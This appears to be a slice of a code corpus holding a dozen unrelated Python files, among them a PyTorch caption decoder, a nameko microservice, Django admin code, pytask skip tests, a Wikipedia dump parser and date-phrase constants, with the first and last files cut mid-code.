last_hidden = torch.index_select(last_hidden, 0, Variable(reverse_batch_idx, requires_grad=False))
return last_hidden
class DecoderRNN(nn.Module):
def __init__(self, embed_size, hidden_size, vocab_size, num_layers):
"""Set the hyper-parameters and build the layers."""
super(DecoderRNN, self).__init__()
self.embed = nn.Embedding(vocab_size, embed_size)
self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True)
self.linear = nn.Linear(hidden_size, vocab_size)
self.init_weights()
def init_weights(self):
"""Initialize weights."""
self.embed.weight.data.uniform_(-0.1, 0.1)
self.linear.weight.data.uniform_(-0.1, 0.1)
self.linear.bias.data.fill_(0)
def forward(self, features, captions, lengths):
"""Decode image feature vectors and generates captions."""
embeddings = self.embed(captions)
embeddings = torch.cat((features.unsqueeze(1), embeddings), 1)
packed = pack(embeddings, lengths, batch_first=True)
hiddens, _ = self.lstm(packed)
outputs = self.linear(hiddens[0])
return outputs
def sample(self, features, states=None):
"""Samples captions for given image features (Greedy search)."""
sampled_ids = []
inputs = features.unsqueeze(1)
for i in range(20): # maximum sampling length
hiddens, states = self.lstm(inputs, states) # (batch_size, 1, hidden_size),
outputs = self.linear(hiddens.squeeze(1)) # (batch_size, vocab_size)
predicted = outputs.max(1)[1]
sampled_ids.append(predicted)
inputs = self.embed(predicted)
sampled_ids = torch.cat(sampled_ids, 1) # (batch_size, 20)
return sampled_ids.squeeze()
|
23625
|
from torch import nn, optim
import torch
import model
import torch.nn.utils
import utils
import argparse
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
parser = argparse.ArgumentParser(description='training parameters')
parser.add_argument('--n_hid', type=int, default=128,
help='hidden size of recurrent net')
parser.add_argument('--T', type=int, default=100,
help='length of sequences')
parser.add_argument('--max_steps', type=int, default=60000,
help='max learning steps')
parser.add_argument('--log_interval', type=int, default=100,
help='log interval')
parser.add_argument('--batch', type=int, default=50,
help='batch size')
parser.add_argument('--batch_test', type=int, default=1000,
help='size of test set')
parser.add_argument('--lr', type=float, default=2e-2,
help='learning rate')
parser.add_argument('--dt',type=float, default=6e-2,
help='step size <dt> of the coRNN')
parser.add_argument('--gamma',type=float, default=66,
help='y controle parameter <gamma> of the coRNN')
parser.add_argument('--epsilon',type=float, default = 15,
help='z controle parameter <epsilon> of the coRNN')
args = parser.parse_args()
n_inp = 2
n_out = 1
model = model.coRNN(n_inp, args.n_hid, n_out, args.dt, args.gamma, args.epsilon).to(device)
objective = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), lr=args.lr)
def test():
model.eval()
with torch.no_grad():
data, label = utils.get_batch(args.T, args.batch_test)
label = label.unsqueeze(1)
out = model(data.to(device))
loss = objective(out, label.to(device))
return loss.item()
def train():
test_mse = []
for i in range(args.max_steps):
data, label = utils.get_batch(args.T,args.batch)
label = label.unsqueeze(1)
optimizer.zero_grad()
out = model(data.to(device))
loss = objective(out, label.to(device))
loss.backward()
optimizer.step()
if(i%100==0 and i!=0):
mse_error = test()
print('Test MSE: {:.6f}'.format(mse_error))
test_mse.append(mse_error)
model.train()
if __name__ == '__main__':
train()
|
23634
|
import json
import datetime
import requests
from nameko.web.handlers import http
from nameko.timer import timer
from statsd import StatsClient
from circuitbreaker import circuit
class DemoChassisService:
name = "demo_chassis_service"
statsd = StatsClient('localhost', 8125, prefix='simplebank-demo')
@http('GET', '/health')
@statsd.timer('health')
def health(self, _request):
return json.dumps({'ok': datetime.datetime.utcnow().__str__()})
@http('GET', '/external')
@circuit(failure_threshold=5, expected_exception=ConnectionError)
@statsd.timer('external')
def external_request(self, _request):
response = requests.get('https://jsonplaceholder.typicode.com/posts/1')
return json.dumps({'code': response.status_code, 'body': response.text})
@http('GET', '/error')
@circuit(failure_threshold=5, expected_exception=ZeroDivisionError)
@statsd.timer('http_error')
def error_http_request(self):
return json.dumps({1 / 0})
class HealthCheckService:
name = "health_check_service"
statsd = StatsClient('localhost', 8125, prefix='simplebank-demo')
@timer(interval=10)
@statsd.timer('check_demo_service')
def check_demo_service(self):
response = requests.get('http://0.0.0.0:8000/health')
print("DemoChassisService HEALTH CHECK: status_code {}, response: {}".format(
response.status_code, response.text))
|
23639
|
from mpl_toolkits.basemap import Basemap
import matplotlib.pyplot as plt
map = Basemap(projection='cyl')
map.drawmapboundary(fill_color='aqua')
map.fillcontinents(color='coral',lake_color='aqua')
map.drawcoastlines()
plt.show()
|
23646
|
import logging
import ibmsecurity.utilities.tools
import time
logger = logging.getLogger(__name__)
requires_model = "Appliance"
def get(isamAppliance, check_mode=False, force=False):
"""
Retrieving the current FIPS Mode configuration
"""
return isamAppliance.invoke_get("Retrieving the current FIPS Mode configuration",
"/fips_cfg", requires_model=requires_model)
def set(isamAppliance, fipsEnabled=True, tlsv10Enabled=True, tlsv11Enabled=False, check_mode=False, force=False):
"""
Updating the FIPS Mode configuration
"""
obj = _check(isamAppliance, fipsEnabled, tlsv10Enabled, tlsv11Enabled)
if force is True or obj['value'] is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=obj['warnings'])
else:
return isamAppliance.invoke_put(
"Updating the FIPS Mode configuration",
"/fips_cfg",
{
"fipsEnabled": fipsEnabled,
"tlsv10Enabled": tlsv10Enabled,
"tlsv11Enabled": tlsv11Enabled
},
requires_model=requires_model
)
return isamAppliance.create_return_object(warnings=obj['warnings'])
def restart(isamAppliance, check_mode=False, force=False):
"""
Rebooting and enabling the FIPS Mode configuration
:param isamAppliance:
:param check_mode:
:param force:
:return:
"""
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
return isamAppliance.invoke_put(
"Rebooting and enabling the FIPS Mode configuration",
"/fips_cfg/restart",
{}, requires_model=requires_model
)
def restart_and_wait(isamAppliance, wait_time=300, check_freq=5, check_mode=False, force=False):
"""
Restart after FIPS configuration changes
:param isamAppliance:
:param wait_time:
:param check_freq:
:param check_mode:
:param force:
:return:
"""
if isamAppliance.facts['model'] != "Appliance":
return isamAppliance.create_return_object(
warnings="API invoked requires model: {0}, appliance is of deployment model: {1}.".format(
requires_model, isamAppliance.facts['model']))
warnings = []
if check_mode is True:
return isamAppliance.create_return_object(changed=True)
else:
firmware = ibmsecurity.isam.base.firmware.get(isamAppliance, check_mode=check_mode, force=force)
ret_obj = restart(isamAppliance)
if ret_obj['rc'] == 0:
sec = 0
# Now check if it is up and running
while 1:
ret_obj = ibmsecurity.isam.base.firmware.get(isamAppliance, check_mode=check_mode, force=force,
ignore_error=True)
# check partition last_boot time
if ret_obj['rc'] == 0 and isinstance(ret_obj['data'], list) and len(ret_obj['data']) > 0 and \
(('last_boot' in ret_obj['data'][0] and ret_obj['data'][0]['last_boot'] != firmware['data'][0][
'last_boot'] and ret_obj['data'][0]['active'] == True) or (
'last_boot' in ret_obj['data'][1] and ret_obj['data'][1]['last_boot'] !=
firmware['data'][1]['last_boot'] and ret_obj['data'][1]['active'] == True)):
logger.info("Server is responding and has a different boot time!")
return isamAppliance.create_return_object(warnings=warnings)
else:
time.sleep(check_freq)
sec += check_freq
logger.debug(
"Server is not responding yet. Waited for {0} secs, next check in {1} secs.".format(sec,
check_freq))
if sec >= wait_time:
warnings.append(
"The FIPS restart not detected or completed, exiting... after {0} seconds".format(sec))
break
return isamAppliance.create_return_object(warnings=warnings)
def _check(isamAppliance, fipsEnabled, tlsv10Enabled, tlsv11Enabled):
obj = {'value': True, 'warnings': ""}
ret_obj = get(isamAppliance)
obj['warnings'] = ret_obj['warnings']
if ret_obj['data']['fipsEnabled'] != fipsEnabled:
logger.info("fipsEnabled change to {0}".format(fipsEnabled))
obj['value'] = False
return obj
if ret_obj['data']['tlsv10Enabled'] != tlsv10Enabled:
logger.info("TLS v1.0 change to {0}".format(tlsv10Enabled))
obj['value'] = False
return obj
if ret_obj['data']['tlsv11Enabled'] != tlsv11Enabled:
logger.info("TLS v1.1 change to {0}".format(tlsv11Enabled))
obj['value'] = False
return obj
return obj
def compare(isamAppliance1, isamAppliance2):
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return ibmsecurity.utilities.tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
|
23680
|
from django.contrib import admin
class ChildrenInline(admin.TabularInline):
sortable_field_name = "order"
class GipsyMenu(admin.ModelAdmin):
inlines = [ChildrenInline]
exclude = ('parent',)
list_display = ['name', 'order']
ordering = ['order']
def get_queryset(self, request):
"""Overrides default queryset to only display parent items"""
query = super(GipsyMenu, self).get_queryset(request)
return query.filter(parent__isnull=True)
|
23714
|
class PaginatorOptions:
def __init__(
self,
page_number: int,
page_size: int,
sort_column: str = None,
sort_descending: bool = None
):
self.sort_column = sort_column
self.sort_descending = sort_descending
self.page_number = page_number
self.page_size = page_size
assert (page_number is not None and page_size) \
or (page_number is not None and not page_size), \
'Specify both page_number and page_size'
if not sort_column:
self.sort_column = 'id'
self.sort_descending = True
__all__ = ['PaginatorOptions']
|
23722
|
from typedpy import *
class Person(Structure):
first_name = String()
last_name = String()
age = Integer(minimum=1)
_required = ['first_name', 'last_name']
class Groups(Structure):
groups = Array(items=Person)
_required = ['groups']
# ********************
class Example1(Structure):
people = Array(items=Person)
id = Integer()
i = Integer()
s = String()
m = Map(items=[String(), Person])
groups = Groups
_required = ['groups', 'id', 'm', 'people']
|
23729
|
import textwrap
from contextlib import ExitStack as does_not_raise # noqa: N813
import pytest
from _pytask.mark import Mark
from _pytask.outcomes import Skipped
from _pytask.outcomes import SkippedAncestorFailed
from _pytask.outcomes import SkippedUnchanged
from _pytask.skipping import pytask_execute_task_setup
from pytask import cli
from pytask import main
class DummyClass:
pass
@pytest.mark.end_to_end
def test_skip_unchanged(tmp_path):
source = """
def task_dummy():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
session = main({"paths": tmp_path})
assert isinstance(session.execution_reports[0].exc_info[1], SkippedUnchanged)
@pytest.mark.end_to_end
def test_skip_unchanged_w_dependencies_and_products(tmp_path):
source = """
import pytask
@pytask.mark.depends_on("in.txt")
@pytask.mark.produces("out.txt")
def task_dummy(depends_on, produces):
produces.write_text(depends_on.read_text())
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
tmp_path.joinpath("in.txt").write_text("Original content of in.txt.")
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
assert tmp_path.joinpath("out.txt").read_text() == "Original content of in.txt."
session = main({"paths": tmp_path})
assert isinstance(session.execution_reports[0].exc_info[1], SkippedUnchanged)
assert tmp_path.joinpath("out.txt").read_text() == "Original content of in.txt."
@pytest.mark.end_to_end
def test_skipif_ancestor_failed(tmp_path):
source = """
import pytask
@pytask.mark.produces("out.txt")
def task_first():
assert 0
@pytask.mark.depends_on("out.txt")
def task_second():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert not session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Exception)
assert not session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], SkippedAncestorFailed)
@pytest.mark.end_to_end
def test_if_skip_decorator_is_applied_to_following_tasks(tmp_path):
source = """
import pytask
@pytask.mark.skip
@pytask.mark.produces("out.txt")
def task_first():
assert 0
@pytask.mark.depends_on("out.txt")
def task_second():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
assert session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], Skipped)
@pytest.mark.end_to_end
@pytest.mark.parametrize(
"mark_string", ["@pytask.mark.skip", "@pytask.mark.skipif(True, reason='bla')"]
)
def test_skip_if_dependency_is_missing(tmp_path, mark_string):
source = f"""
import pytask
{mark_string}
@pytask.mark.depends_on("in.txt")
def task_first():
assert 0
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
@pytest.mark.end_to_end
@pytest.mark.parametrize(
"mark_string", ["@pytask.mark.skip", "@pytask.mark.skipif(True, reason='bla')"]
)
def test_skip_if_dependency_is_missing_only_for_one_task(runner, tmp_path, mark_string):
source = f"""
import pytask
{mark_string}
@pytask.mark.depends_on("in.txt")
def task_first():
assert 0
@pytask.mark.depends_on("in.txt")
def task_second():
assert 0
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
result = runner.invoke(cli, [tmp_path.as_posix()])
assert result.exit_code == 4
assert "in.txt" in result.output
assert "task_first" not in result.output
assert "task_second" in result.output
@pytest.mark.end_to_end
def test_if_skipif_decorator_is_applied_skipping(tmp_path):
source = """
import pytask
@pytask.mark.skipif(condition=True, reason="bla")
@pytask.mark.produces("out.txt")
def task_first():
assert False
@pytask.mark.depends_on("out.txt")
def task_second():
assert False
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
node = session.collection_reports[0].node
assert len(node.markers) == 1
assert node.markers[0].name == "skipif"
assert node.markers[0].args == ()
assert node.markers[0].kwargs == {"condition": True, "reason": "bla"}
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
assert session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], Skipped)
assert session.execution_reports[0].exc_info[1].args[0] == "bla"
@pytest.mark.end_to_end
def test_if_skipif_decorator_is_applied_execute(tmp_path):
source = """
import pytask
@pytask.mark.skipif(False, reason="bla")
@pytask.mark.produces("out.txt")
def task_first(produces):
with open(produces, "w") as f:
f.write("hello world.")
@pytask.mark.depends_on("out.txt")
def task_second():
pass
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
node = session.collection_reports[0].node
assert len(node.markers) == 1
assert node.markers[0].name == "skipif"
assert node.markers[0].args == (False,)
assert node.markers[0].kwargs == {"reason": "bla"}
assert session.execution_reports[0].success
assert session.execution_reports[0].exc_info is None
assert session.execution_reports[1].success
assert session.execution_reports[1].exc_info is None
@pytest.mark.end_to_end
def test_if_skipif_decorator_is_applied_any_condition_matches(tmp_path):
"""Any condition of skipif has to be True and only their message is shown."""
source = """
import pytask
@pytask.mark.skipif(condition=False, reason="I am fine")
@pytask.mark.skipif(condition=True, reason="No, I am not.")
@pytask.mark.produces("out.txt")
def task_first():
assert False
@pytask.mark.depends_on("out.txt")
def task_second():
assert False
"""
tmp_path.joinpath("task_dummy.py").write_text(textwrap.dedent(source))
session = main({"paths": tmp_path})
node = session.collection_reports[0].node
assert len(node.markers) == 2
assert node.markers[0].name == "skipif"
assert node.markers[0].args == ()
assert node.markers[0].kwargs == {"condition": True, "reason": "No, I am not."}
assert node.markers[1].name == "skipif"
assert node.markers[1].args == ()
assert node.markers[1].kwargs == {"condition": False, "reason": "I am fine"}
assert session.execution_reports[0].success
assert isinstance(session.execution_reports[0].exc_info[1], Skipped)
assert session.execution_reports[1].success
assert isinstance(session.execution_reports[1].exc_info[1], Skipped)
assert session.execution_reports[0].exc_info[1].args[0] == "No, I am not."
@pytest.mark.unit
@pytest.mark.parametrize(
("marker_name", "expectation"),
[
("skip_unchanged", pytest.raises(SkippedUnchanged)),
("skip_ancestor_failed", pytest.raises(SkippedAncestorFailed)),
("skip", pytest.raises(Skipped)),
("", does_not_raise()),
],
)
def test_pytask_execute_task_setup(marker_name, expectation):
class Task:
pass
task = Task()
kwargs = {"reason": ""} if marker_name == "skip_ancestor_failed" else {}
task.markers = [Mark(marker_name, (), kwargs)]
with expectation:
pytask_execute_task_setup(task)
|
23731
|
from django.apps import AppConfig
from django.core.checks import Tags, register
from django_version_checks import checks
class DjangoVersionChecksAppConfig(AppConfig):
name = "django_version_checks"
verbose_name = "django-version-checks"
def ready(self) -> None:
register(Tags.compatibility)(checks.check_config)
register(Tags.compatibility)(checks.check_python_version)
register(Tags.database)(checks.check_postgresql_version)
register(Tags.database)(checks.check_mysql_version)
register(Tags.database)(checks.check_sqlite_version)
|
23758
|
from poketype import PokemonTypeIdentifier
from flask import Flask, request, make_response,jsonify
import os
id = PokemonTypeIdentifier()
app = Flask(__name__,static_url_path='/static')
@app.route('/findtype',methods=['GET'])
def classify():
poke_name=request.args.get('pokename')
results = id.predict_type(poke_name)
return jsonify({'results':results})
@app.route('/',methods=['GET'])
def root():
return app.send_static_file('index.html')
if __name__ == '__main__':
port = int(os.environ.get('PORT', 8001))
app.run(debug=True,host='0.0.0.0',port=port,use_reloader=False)
|
23771
|
import xml.sax
import re
import os
import json
import time
current_milli_time = lambda: int(round(time.time() * 1000))
RE_LINKS = re.compile(r'\[{2}(.*?)\]{2}', re.DOTALL | re.UNICODE)
IGNORED_NAMESPACES = [
'wikipedia', 'category', 'file', 'portal', 'template',
'mediaWiki', 'user', 'help', 'book', 'draft', 'wikiProject',
'special', 'talk', 'image','module'
]
"""MediaWiki namespaces that ought to be ignored."""
class WikiHandler(xml.sax.ContentHandler):
def __init__(self,title2Id,id2Title,redirects):
self.tag = ""
self.content = ''
self.title = ''
self.id = -1
self.title2Id = title2Id
self.id2Title = id2Title
self.redirects = redirects
self.counter_all = 0
self.attributes = {}
self.n = 0
self.start = current_milli_time()
# Call when an element starts
def startElement(self, tag, attributes):
self.tag = tag
self.attributes = attributes
# Call when an elements ends
def endElement(self, tag):
if tag == 'title':
self.title = self.content.strip()
elif tag == 'id':
self.id = int(self.content)
if self.title not in self.title2Id:
self.title2Id[self.title] = self.id
self.id2Title[self.id] = self.title
self.counter_all += 1
if self.counter_all % 1000 == 0:
diff = current_milli_time() - self.start
print('Pages processed: ' + str(self.counter_all) + ', avg t: ' + str(diff / self.counter_all), end='\r')
elif tag == 'text':
self.n += 1
if not any(self.title.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) and not self.title.lower().startswith('list of'):
self.processArticle()
elif tag == 'redirect' and 'title' in self.attributes:
redirect = self.attributes['title']
if not any(self.title.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) \
and not any(redirect.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) \
and not redirect.lower().startswith('list of') \
and not self.title.lower().startswith('list of'):
self.redirects[self.title] = redirect
self.content = ""
# Call when a character is read
def characters(self, content):
self.content += content
def processArticle(self):
text = self.content.strip()
#self.title2Id[self.title] = self.id
if text.lower().startswith('#redirect'):
match = re.search(RE_LINKS,text)
if match:
redirect = match.group(1).strip()
pos_bar = redirect.find('|')
if pos_bar > -1:
redirect = redirect[:pos_bar]
redirect = redirect.replace('_',' ')
if not any(redirect.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) and not redirect.lower().startswith('list of'):
self.redirects[self.title] = redirect
else:
lines = text.split('\n')
for line in lines:
if not line.startswith('{{redirect|'):
break
else:
line = line[11:]
line = line[:line.find('|')]
if len(line) > 0:
if not any(line.lower().startswith(ignore + ':') for ignore in IGNORED_NAMESPACES) and not line.lower().startswith('list of'):
self.redirects[line] = self.title
if (__name__ == "__main__"):
title2Id = {}
id2Title = {}
redirects = {}
config = json.load(open('config/config.json'))
wikipath = config['wikipath']
outputpath = config['outputpath']
dictionarypath = outputpath + 'dictionaries/'
mode = 0o755
os.mkdir(outputpath, mode)
os.mkdir(dictionarypath, mode)
parser = xml.sax.make_parser()
parser.setFeature(xml.sax.handler.feature_namespaces, 0)
Handler = WikiHandler(title2Id,id2Title,redirects)
parser.setContentHandler(Handler)
parser.parse(wikipath)
print('done')
with open(dictionarypath + 'title2Id.json', 'w') as f:
json.dump(title2Id, f)
with open(dictionarypath + 'id2Title.json', 'w') as f:
json.dump(id2Title, f)
with open(dictionarypath + 'redirects.json', 'w') as f:
json.dump(redirects, f)
|
23778
|
from datetime import datetime, timedelta
from enum import Enum, auto
from dateutil.relativedelta import relativedelta
from .baseclasses import Constant, MethodEnum
from .formulars import days_feb, eastern_calc, thanksgiving_calc, year_start
class ConstantOption(Enum):
TIME_VARIABLE = auto()
DATE_VARIABLE = auto()
YEAR_VARIABLE = auto()
class Constants:
CHRISTMAS = Constant('christmas', ['xmas'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=25))
HOLY_EVE = Constant('holy eve', options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=24))
SILVESTER = Constant('silvester', ['new years eve'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=31))
EASTERN = Constant('eastern', ['easter'], options=[ConstantOption.YEAR_VARIABLE], time_value=eastern_calc)
NICHOLAS = Constant('nicholas', ['nicholas day'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=6))
HALLOWEEN = Constant('halloween', options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=10, day=31))
APRIL_FOOLS_DAY = Constant('april fools day', ['april fool day'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=4, day=1))
THANKSGIVING = Constant('thanksgiving', options=[ConstantOption.YEAR_VARIABLE], time_value=thanksgiving_calc)
SAINT_PATRICKS_DAY = Constant('saint patrick\'s day',
['saint patricks day', 'st. patrick\'s day', 'saint pt. day', 'st patrick\'s day', 'st patricks day'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=3, day=17))
VALENTINES_DAY = Constant('valentines day', ['valentine', 'valentine day'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=2, day=14))
PI_DAY = Constant("pi day", ["piday", "pi-day"], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=3, day=14))
TAU_DAY = Constant("tau day", ["tauday", "tau-day"], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=6, day=28))
SUMMER_BEGIN = Constant('summer begin', ['summer', 'begin of summer', 'begin of the summer'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=6, day=1))
WINTER_BEGIN = Constant('winter begin', ['winter', 'begin of winter', 'begin of the winter'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=1))
SPRING_BEGIN = Constant('spring begin', ['spring', 'begin of spring', 'begin of the spring'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=3, day=1))
FALL_BEGIN = Constant('fall begin',
['fall', 'begin of fall', 'begin of the fall', 'autumn begin', 'autumn', 'begin of autumn',
'begin of the autumn'],
options=[ConstantOption.YEAR_VARIABLE], time_value=lambda year_time: datetime(year=year_time, month=9, day=1))
SUMMER_END = Constant('summer end', ['end of summer', 'end of the summer'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=8, day=31, hour=23, minute=59, second=59))
WINTER_END = Constant('winter end', ['end of winter', 'end of the winter'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=2, day=days_feb(year_time), hour=23, minute=59,
second=59))
SPRING_END = Constant('spring end', ['end of spring', 'end of the spring'], options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=5, day=31, hour=23, minute=59, second=59))
FALL_END = Constant('fall end', ['end of fall', 'end of the fall', 'autumn end', 'end of autumn', 'end of the autumn'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=11, day=30, hour=23, minute=59, second=59))
MORNING = Constant('morning', ['at morning'],
options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE])
EVENING = Constant('evening', ['at evening'],
options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE])
LUNCHTIME = Constant('lunchtime', ['lunch'], options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE])
# advent of code always starts at midnight 1st december in SET (5 hours negative UTC offset)
BEGIN_AOC = Constant('aoc begin',
['aoc', 'begin of aoc', 'begin of the aoc', 'advent of code begin', 'advent of code', 'begin of advent of code',
'begin of the advent of code'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=1, hour=0),
offset=-5)
END_AOC = Constant('aoc end',
['end of aoc', 'end of the aoc', 'advent of code end', 'end of advent of code', 'end of the advent of code'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=26, hour=0),
offset=-5)
END_OF_YEAR = Constant('end of year', ['the end of year', 'the end of the year', 'end of the year'],
options=[ConstantOption.YEAR_VARIABLE],
time_value=lambda year_time: datetime(year=year_time, month=12, day=31, hour=23, minute=59, second=59))
BEGIN_OF_YEAR = Constant('begin of year', ['the begin of year', 'the begin of the year', 'begin of the year'],
options=[ConstantOption.YEAR_VARIABLE], time_value=year_start)
INFINITY = Constant('infinity', ['inf'], value=None)
TODAY = Constant('today', options=[ConstantOption.TIME_VARIABLE],
time_value=lambda _: datetime(datetime.today().year, datetime.today().month, datetime.today().day))
TOMORROW = Constant('tomorrow', options=[ConstantOption.TIME_VARIABLE],
time_value=lambda _: datetime(datetime.today().year, datetime.today().month, datetime.today().day) + relativedelta(
days=1))
YESTERDAY = Constant('yesterday', options=[ConstantOption.TIME_VARIABLE],
time_value=lambda _: datetime(datetime.today().year, datetime.today().month, datetime.today().day) - relativedelta(
days=1))
NOW = Constant('now', ['at the moment', 'current time', 'current time now'], time_value=lambda _: datetime.now())
ALL = [
CHRISTMAS, HOLY_EVE, SILVESTER, EASTERN, NICHOLAS, HALLOWEEN, APRIL_FOOLS_DAY, THANKSGIVING, SAINT_PATRICKS_DAY, VALENTINES_DAY,
PI_DAY, TAU_DAY,
SUMMER_END, WINTER_END, SPRING_END, FALL_END, SUMMER_BEGIN, WINTER_BEGIN, SPRING_BEGIN, FALL_BEGIN,
MORNING, EVENING, LUNCHTIME,
BEGIN_AOC, END_AOC,
END_OF_YEAR, BEGIN_OF_YEAR,
INFINITY,
TODAY, TOMORROW, YESTERDAY, NOW
]
ALL_RELATIVE_CONSTANTS = [TODAY, TOMORROW, YESTERDAY, NOW]
class DatetimeDeltaConstants:
# time_value is a tuple containing (hours, minutes, seconds)
MIDNIGHT = Constant('midnight', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (0, 0, 0))
NIGHT = Constant('night', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (21, 0, 0))
MORNING_NIGHT = Constant('morning night', value=0, options=[ConstantOption.DATE_VARIABLE],
time_value=lambda _: (3, 0, 0))
DAYLIGHT_CHANGE = Constant('daylight change', ['daylight saving', 'daylight saving time'], value=0,
options=[ConstantOption.YEAR_VARIABLE, ConstantOption.DATE_VARIABLE],
time_value=lambda _: (6, 0, 0))
SUNRISE = Constant('sunrise', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (7, 0, 0))
MORNING = Constant('morning', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (6, 0, 0))
BREAKFAST = Constant('breakfast', value=0, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (8, 0, 0))
MIDDAY = Constant('midday', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (12, 0, 0))
LUNCH = Constant('lunch', ['lunchtime'], value=12, options=[ConstantOption.DATE_VARIABLE],
time_value=lambda _: (12, 0, 0))
AFTERNOON = Constant('afternoon', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (15, 0, 0))
EVENING = Constant('evening', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (18, 0, 0))
DINNER = Constant('dinner', ['dinnertime'], value=12, options=[ConstantOption.DATE_VARIABLE],
time_value=lambda _: (19, 0, 0))
DAWN = Constant('dawn', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (6, 0, 0))
DUSK = Constant('dusk', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (20, 0, 0))
SUNSET = Constant('sunset', value=12, options=[ConstantOption.DATE_VARIABLE], time_value=lambda _: (18, 30, 0))
ALL = [
MORNING, AFTERNOON, EVENING, NIGHT, MORNING_NIGHT, DAYLIGHT_CHANGE, MIDNIGHT, MIDDAY, DAWN, DUSK,
SUNRISE, SUNSET, LUNCH, DINNER, BREAKFAST
]
class NumberConstants:
# Presented to you by github copilot
ONE = Constant('one', value=1)
TWO = Constant('two', value=2)
THREE = Constant('three', value=3)
FOUR = Constant('four', value=4)
FIVE = Constant('five', value=5)
SIX = Constant('six', value=6)
SEVEN = Constant('seven', value=7)
EIGHT = Constant('eight', value=8)
NINE = Constant('nine', value=9)
TEN = Constant('ten', value=10)
ELEVEN = Constant('eleven', value=11)
TWELVE = Constant('twelve', value=12)
THIRTEEN = Constant('thirteen', value=13)
FOURTEEN = Constant('fourteen', value=14)
FIFTEEN = Constant('fifteen', value=15)
SIXTEEN = Constant('sixteen', value=16)
SEVENTEEN = Constant('seventeen', value=17)
EIGHTEEN = Constant('eighteen', value=18)
NINETEEN = Constant('nineteen', value=19)
TWENTY = Constant('twenty', value=20)
TWENTY_ONE = Constant('twenty one', alias=["twentyone", "twenty-one"], value=21)
TWENTY_TWO = Constant('twenty two', alias=["twentytwo", "twenty-two"], value=22)
TWENTY_THREE = Constant('twenty three', alias=["twentythree", "twenty-three"], value=23)
TWENTY_FOUR = Constant('twenty four', alias=["twentyfour", "twenty-four"], value=24)
TWENTY_FIVE = Constant('twenty five', alias=["twentyfive", "twenty-five"], value=25)
